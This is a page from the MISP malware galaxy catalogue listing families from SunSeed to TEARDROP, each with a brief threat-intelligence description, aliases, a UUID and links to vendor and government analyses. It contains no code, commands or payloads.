According to Proofpoint, this is a Lua-based malware likely used by a nation-state sponsored attacker to target European government personnel involved in managing the logistics of refugees fleeing Ukraine.
Internal MISP references
UUID a89f7e01-b049-4d09-aca3-ce19d91c4544
which can be used as unique global reference for SunSeed
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sunseed - webarchive
- https://blogs.blackberry.com/en/2022/03/threat-thursday-sunseed-malware - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SuperBear RAT
Internal MISP references
UUID a6ca0a04-359d-4f7a-b556-46b33ec75473
which can be used as unique global reference for SuperBear RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SUPERNOVA
According to CISA, SUPERNOVA is a malicious webshell backdoor that allows a remote operator to dynamically inject C# source code into a web portal to subsequently inject code. APT actors use SUPERNOVA to perform reconnaissance, conduct domain mapping, and steal sensitive information and credentials.
Internal MISP references
UUID 62674a18-54c6-4c57-84cc-ea6a3bb2d6d6
which can be used as unique global reference for SUPERNOVA
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova - webarchive
- https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/ - webarchive
- https://github.com/fireeye/sunburst_countermeasures - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-008a - webarchive
- https://unit42.paloaltonetworks.com/solarstorm-supernova - webarchive
- https://unit42.paloaltonetworks.com/solarstorm-supernova/ - webarchive
- https://www.anquanke.com/post/id/226029 - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a - webarchive
- https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group - webarchive
- https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html - webarchive
- https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis - webarchive
- https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html - webarchive
- https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/ - webarchive
- https://github.com/fireeye/sunburst_countermeasures/pull/5 - webarchive
- https://twitter.com/MalwareRE/status/1342888881373503488 - webarchive
- https://www.solarwinds.com/securityadvisory/faq - webarchive
- https://www.youtube.com/watch?v=7WX5fCEzTlA - webarchive
- https://www.cisa.gov/news-events/analysis-reports/ar21-112a - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a - webarchive
- https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html - webarchive
- https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html - webarchive
- https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan - webarchive
- https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.solarwinds.com/securityadvisory - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SuppoBox
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SuppoBox.
Known Synonyms |
---|
Bayrob |
Nivdort |
pizd |
Internal MISP references
UUID dd9939a4-df45-4c7c-8a8d-83b40766aacd
which can be used as unique global reference for SuppoBox
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox - webarchive
- https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us - webarchive
- https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1 - webarchive
- https://blog.avast.com/2013/06/18/your-facebook-connection-is-now-secured/ - webarchive
- https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim - webarchive
- https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf - webarchive
- https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
surtr
According to PCrisk, Surtr is ransomware. Malware of this type encrypts files (and renames them) and generates a ransom note. Surtr appends the decryptmydata@mailfence.com email address and the ".SURT" extension to filenames.
Internal MISP references
UUID 8666afcc-8cc2-4856-83de-b7e8b4309367
which can be used as unique global reference for surtr
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SVCReady
According to PCrisk, SVCReady collects information about the infected system such as username, computer name, time zone, computer manufacturer, BIOS, and firmware. Also, it gathers lists of running processes and installed software. SVCReady sends collected data to the C2 server. Additionally, SVCReady attempts to maintain its foothold on the system by creating a scheduled task.
Internal MISP references
UUID 20157c10-2a5f-49d9-baf5-d350fb65c06e
which can be used as unique global reference for SVCReady
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SweetSpecter
Internal MISP references
UUID 5ba81060-0eba-4811-b1cb-6b21edd7ed5b
which can be used as unique global reference for SweetSpecter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
swen
Internal MISP references
UUID 63657a3b-1f8f-422d-80de-fe4644f5d7ba
which can be used as unique global reference for swen
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SwiftSlicer
According to ESET, this is a wiper written in Go that was deployed against a Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim's Active Directory environment.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SwiftSlicer.
Known Synonyms |
---|
JaguarBlade |
Internal MISP references
UUID dba43d45-053f-4225-b813-ff7727b2b7d2
which can be used as unique global reference for SwiftSlicer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.swiftslicer - webarchive
- https://twitter.com/ESETresearch/status/1618960022150729728 - webarchive
- https://www.welivesecurity.com/2023/01/27/swiftslicer-new-destructive-wiper-malware-ukraine/ - webarchive
- https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sword
Internal MISP references
UUID 2112870f-06f1-44a9-9c43-6cc4fb90e295
which can be used as unique global reference for Sword
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
sykipot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular sykipot.
Known Synonyms |
---|
Wkysol |
getkys |
Internal MISP references
UUID 99ffeb75-8d21-43a2-b5f7-f58bcbac2228
which can be used as unique global reference for sykipot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-edison - webarchive
- https://www.alienvault.com/blogs/labs-research/sykipot-is-back - webarchive
- https://www.symantec.com/connect/blogs/sykipot-attacks - webarchive
- https://community.rsa.com/thread/185437 - webarchive
- https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SynAck
Internal MISP references
UUID a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2
which can be used as unique global reference for SynAck
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SyncCrypt
Internal MISP references
UUID e717a26d-17aa-4cd7-88de-dc75aa365232
which can be used as unique global reference for SyncCrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SynFlooder
Internal MISP references
UUID d327b4d9-e1c8-4c71-b9fe-775d1607e7d4
which can be used as unique global reference for SynFlooder
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Synth Loader
Internal MISP references
UUID ffd74637-b518-4622-939b-c0669a81f3a9
which can be used as unique global reference for Synth Loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sys10
Internal MISP references
UUID 2ae57534-6aac-4025-8d93-888dab112b45
which can be used as unique global reference for Sys10
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10 - webarchive
- https://securelist.com/analysis/publications/69953/the-naikon-apt/ - webarchive
- https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Syscon
SYSCON is a Remote Access Trojan used in a targeted campaign against US government agencies. It has recently been observed in conjunction with the CARROTBAT and CARROTBALL downloaders, and it uses the File Transfer Protocol as its command-and-control channel. Use of the family is attributed by Unit 42 to the Konni Group.
Internal MISP references
UUID 4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6
which can be used as unique global reference for Syscon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/ - webarchive
- https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/ - webarchive
- https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SysGet
Internal MISP references
UUID a4b9c526-42d0-4de9-ab8e-e78f99655d11
which can be used as unique global reference for SysGet
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget - webarchive
- http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/ - webarchive
- http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SysJoker (Windows)
Sysjoker is a backdoor malware that was first discovered in December 2021 by Intezer. It is sophisticated and written from scratch in C++. Sysjoker is a cross-platform malware that has Linux, Windows, and macOS variants. Possible attack vectors for Sysjoker are email attachments, malicious advertisements, and trojanized software.
Internal MISP references
UUID 16387289-9064-4ae9-8493-0a3623cdfd9a
which can be used as unique global reference for SysJoker (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sysjoker - webarchive
- https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html - webarchive
- https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/ - webarchive
- https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/ - webarchive
- https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SysKit
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SysKit.
Known Synonyms |
---|
IvizTech |
MANGOPUNCH |
Internal MISP references
UUID 4922f27b-a97c-4d6b-9425-1705f4716ee0
which can be used as unique global reference for SysKit
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.syskit - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media - webarchive
- https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html - webarchive
- https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897 - webarchive
- https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/ - webarchive
- https://twitter.com/QW5kcmV3/status/1176861114535165952 - webarchive
- https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sysraw Stealer
Sysraw stealer got its name because at some point it was started as "ZSysRaw\sysraw.exe". PDB strings suggest the name "Clipsa", though. The first stage connects to /WPCoreLog/, the second one to /WPSecurity/. Its behavior suggests that it is an info stealer. It creates a rather large number of files in a subdirectory (e.g. data) named "1?[-+].dat" and POSTs them.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sysraw Stealer.
Known Synonyms |
---|
Clipsa |
Internal MISP references
UUID f90e9fb9-d60d-415e-9f7f-786ee45f6947
which can be used as unique global reference for Sysraw Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sysrv-hello (Windows)
Sysrv is a cryptojacking malware written in Go. There are Windows and Linux variants.
Internal MISP references
UUID cabc5944-195e-4939-a00f-a3cd6758f308
which can be used as unique global reference for Sysrv-hello (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SysScan
Internal MISP references
UUID 7007b268-f6f4-4a01-9184-fc2334461c38
which can be used as unique global reference for SysScan
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SystemBC
SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on an underground marketplace, Proofpoint decided to call it SystemBC.
SystemBC has been observed occasionally, but more pronounced since June 2019. The first samples go back to October 2018.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SystemBC.
Known Synonyms |
---|
Coroxy |
DroxiDat |
Internal MISP references
UUID cd0ad49d-7f79-45e0-91ba-c5eecdabe3aa
which can be used as unique global reference for SystemBC
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc - webarchive
- https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/ - webarchive
- https://www.reliaquest.com/blog/gootloader-infection-credential-access/ - webarchive
- https://docs.velociraptor.app/exchange/artifacts/pages/systembc/ - webarchive
- https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis - webarchive
- https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/ - webarchive
- https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6 - webarchive
- https://thedfirreport.com/2024/08/26/blacksuit-ransomware/ - webarchive
- https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html - webarchive
- https://www.bitsight.com/blog/emotet-botnet-rises-again - webarchive
- https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/The%20Swiss%20Knife%20-%20SystemBC%20%7C%20Coroxy/The%20Swiss%20Knife-SystemBC_EN.pdf - webarchive
- https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- https://www.crowdstrike.com/blog/hypervisor-jackpotting-lack-of-antivirus-support-opens-the-door-to-adversaries/ - webarchive
- https://cyber.wtf/2023/02/09/defeating-vmprotects-latest-tricks/ - webarchive
- https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/ - webarchive
- https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor - webarchive
- https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html - webarchive
- https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader - webarchive
- https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis - webarchive
- https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits - webarchive
- https://community.riskiq.com/article/47766fbd - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-249a - webarchive
- https://www.kroll.com/en/insights/publications/cyber/inside-the-systembc-malware-server - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf - webarchive
- https://www.mandiant.com/resources/chasing-avaddon-ransomware - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight - webarchive
- https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/ - webarchive
- https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/ - webarchive
- https://securelist.com/focus-on-droxidat-systembc/110302/ - webarchive
- https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/ - webarchive
- https://www.europol.europa.eu/media-press/newsroom/news/largest-ever-operation-against-botnets-hits-dropper-malware-ecosystem - webarchive
- https://asec.ahnlab.com/en/33600/ - webarchive
- https://news.sophos.com/en-us/2020/12/16/systembc/ - webarchive
- https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Szribi
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Szribi.
Known Synonyms |
---|
Srizbi |
Internal MISP references
UUID 66b1094f-7779-43ad-a32b-a9414babcc76
which can be used as unique global reference for Szribi
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi - webarchive
- https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html - webarchive
- https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf - webarchive
- https://www.secureworks.com/research/srizbi - webarchive
- https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
T34loader
Internal MISP references
UUID fe3abd7c-97d6-42b9-b556-057e5588b550
which can be used as unique global reference for T34loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TabMsgSQL
Internal MISP references
UUID 48aa9c41-f420-418b-975c-1fb6e2a91145
which can be used as unique global reference for TabMsgSQL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
taidoor
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular taidoor.
Known Synonyms |
---|
simbot |
Internal MISP references
UUID 94323b32-9566-450b-8480-5f9f53b57948
which can be used as unique global reference for taidoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html - webarchive
- https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf - webarchive
- https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat - webarchive
- https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1 - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a - webarchive
- https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html - webarchive
- https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf - webarchive
- https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TAINTEDSCRIBE
Internal MISP references
UUID 014940fb-6e31-408a-962f-71914d0eb2f5
which can be used as unique global reference for TAINTEDSCRIBE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Taleret
Internal MISP references
UUID b0467c03-824f-4071-8668-f056110d2a50
which can be used as unique global reference for Taleret
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tandfuy
Internal MISP references
UUID 88ff523e-206b-4918-8c93-e2829427eef2
which can be used as unique global reference for Tandfuy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tapaoux
Internal MISP references
UUID 71e77349-98f5-49c6-bff7-6ed3b3d79410
which can be used as unique global reference for Tapaoux
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TargetCompany
This ransomware uses a combination of different crypto algorithms (ChaCha20, AES-128, Curve25519). The activity of this malware is dated to mid-June 2021. The extension of the encrypted files are set to the compromised company: .
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TargetCompany.
Known Synonyms |
---|
Fargo |
Mallox |
Tohnichi |
Internal MISP references
UUID 77af876d-84c5-4da3-a2b0-2fe5c77f758c
which can be used as unique global reference for TargetCompany
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.targetcompany - webarchive
- https://decoded.avast.io/threatresearch/decrypted-targetcompany-ransomware/ - webarchive
- https://securityaffairs.co/wordpress/127761/malware/targetcompany-ransomware-decryptor.html - webarchive
- https://blog.cyble.com/2022/12/08/mallox-ransomware-showing-signs-of-increased-activity/ - webarchive
- https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-targetcompany-ransomware-victims/ - webarchive
- https://www.truesec.com/hub/blog/a-victim-of-mallox-ransomware-how-truesec-csirt-fought-back - webarchive
- https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/ - webarchive
- https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/ - webarchive
- https://www.sangfor.com/blog/cybersecurity/new-threat-mallox-ransomware - webarchive
- https://labs.k7computing.com/index.php/mallox-evading-amsi/ - webarchive
- https://asec.ahnlab.com/en/39152/ - webarchive
- https://id-ransomware.blogspot.com/2021/06/tohnichi-ransomware.html - webarchive
- https://unit42.paloaltonetworks.com/mallox-ransomware/ - webarchive
- https://www.trendmicro.com/en_us/research/23/f/xollam-the-latest-face-of-targetcompany.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tarsip
Internal MISP references
UUID ea6a62b2-db33-4d60-9823-5117c20b6457
which can be used as unique global reference for Tarsip
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Taurus Stealer
According to Zscaler, Taurus is a stealer that surfaced in June 2020. It is being developed by the author(s) who previously created Predator the Thief. The name partly overlaps with the StealerOne / Terra* family (also aliased Taurus Loader), but it appears to be a completely separate project.
Internal MISP references
UUID 68b89458-f78e-41b3-b0ee-c193aaa948f9
which can be used as unique global reference for Taurus Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer - webarchive
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/an-in-depth-analysis-of-the-new-taurus-stealer/ - webarchive
- https://blog.minerva-labs.com/taurus-stealers-evolution - webarchive
- https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md - webarchive
- https://www.secureworks.com/research/the-growing-threat-from-infostealers - webarchive
- https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf - webarchive
- https://www.aon.com/cyber-solutions/aon_cyber_labs/agentvx-and-taurus/ - webarchive
- https://www.zscaler.com/blogs/research/taurus-new-stealer-town - webarchive
- https://outpost24.com/blog/an-in-depth-analysis-of-the-new-taurus-stealer/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TClient
Steve Miller pointed out that it is proxy-aware (Tencent) for C&C communication and uses wolfSSL, which makes it stick out.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TClient.
Known Synonyms |
---|
FIRESHADOW |
Internal MISP references
UUID fc551237-8db7-4cfd-a915-9e8410abb313
which can be used as unique global reference for TClient
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
tDiscoverer
F-Secure described tDiscoverer (also known as HammerDuke) as interesting because it is written in .NET, and even more so because of its occasional use of Twitter as a C&C communication channel. Some HammerDuke variants only contain a hardcoded C&C server address from which they will retrieve commands, but other HammerDuke variants will first use a custom algorithm to generate a Twitter account name based on the current date. If the account exists, HammerDuke will then search for tweets from that account with links to image files that contain embedded commands for the toolset to execute.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular tDiscoverer.
Known Synonyms |
---|
HAMMERTOSS |
HammerDuke |
Internal MISP references
UUID bbbf4786-1aba-40ac-8ad7-c9d8c66197a8
which can be used as unique global reference for tDiscoverer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer - webarchive
- https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf - webarchive
- https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58 - webarchive
- https://securityintelligence.com/hammertoss-what-me-worry/ - webarchive
- https://www.youtube.com/watch?v=UE9suwyuic8 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TDTESS
Internal MISP references
UUID 99d83ee8-6870-4af2-a3c8-cf86baff7cb3
which can be used as unique global reference for TDTESS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TeamSpy
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TeamSpy.
Known Synonyms |
---|
TVRAT |
TVSPY |
TeamViewerENT |
Internal MISP references
UUID 9a82b6f6-2fdf-47bc-af05-cf7ce225fc96
which can be used as unique global reference for TeamSpy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy - webarchive
- https://www.deepinstinct.com/blog/the-russian-spyagent-a-decade-later-and-rat-tools-remain-at-risk - webarchive
- https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/ - webarchive
- https://www.cyber.nj.gov/threat-center/threat-profiles/trojan-variants/spy-agent - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging - webarchive
- https://blog.avast.com/a-deeper-look-into-malware-abusing-teamviewer - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TEARDROP
TEARDROP is a memory-only dropper that runs as a service, spawns a thread and reads from the file "gracious_truth.jpg", which likely has a fake JPG header. Next it checks that HKU\SOFTWARE\Microsoft\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believes that this was used to execute a customized Cobalt Strike BEACON.
Internal MISP references
UUID efa01fef-7faf-4bb2-8630-b3a237df882a
which can be used as unique global reference for TEARDROP
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop - webarchive
- https://github.com/fireeye/sunburst_countermeasures - webarchive
- https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware - webarchive
- https://www.sans.org/webcasts/contrarian-view-solarwinds-119515 - webarchive
- https://unit42.paloaltonetworks.com/atoms/solarphoenix/ - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate - webarchive
- https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf - webarchive
